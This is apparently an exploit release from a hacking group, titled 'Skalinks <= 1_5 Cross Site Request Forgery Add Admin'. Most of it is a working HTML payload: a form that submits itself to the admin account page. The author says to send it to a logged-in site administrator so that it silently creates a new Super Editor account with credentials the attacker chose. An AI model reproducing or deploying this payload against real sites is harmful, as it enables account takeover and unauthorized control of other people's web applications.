######################################################################## ## # _ _ _ _ _____ _ _ # # | | | | | | (_) |_ _| (_) | | # # | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ # # | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ # # | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ # # \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| # # __/ | # # |___/ # #_______________________________________________________________________ _# | | | Site: www.hackinginside.altervista.org | | Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin | | Author: Vincy | | Email: djvincy (at) hotmail (dot) it [email concealed] | |_______________________________________________________________________ _| This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info. It work only if admin's logged. ------------------------------------------------------------------------ ------------------- <form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post"> <input type="text" name="admin_name" value="[ NOME ]"> <input type="text" name="admin_password" value="[ PASSWORD ]"> <input type="text" name="admin_email" value="[ EMAIL ]"> <select name="admin_type"><option value="2">Super Editor</option></select> <input type=hidden name="Add_admin" value="Add Admin"> </form> <script>document.add_admin.submit()</script> ------------------------------------------------------------------------ ------------------- # Vincy - Hacking Inside Crew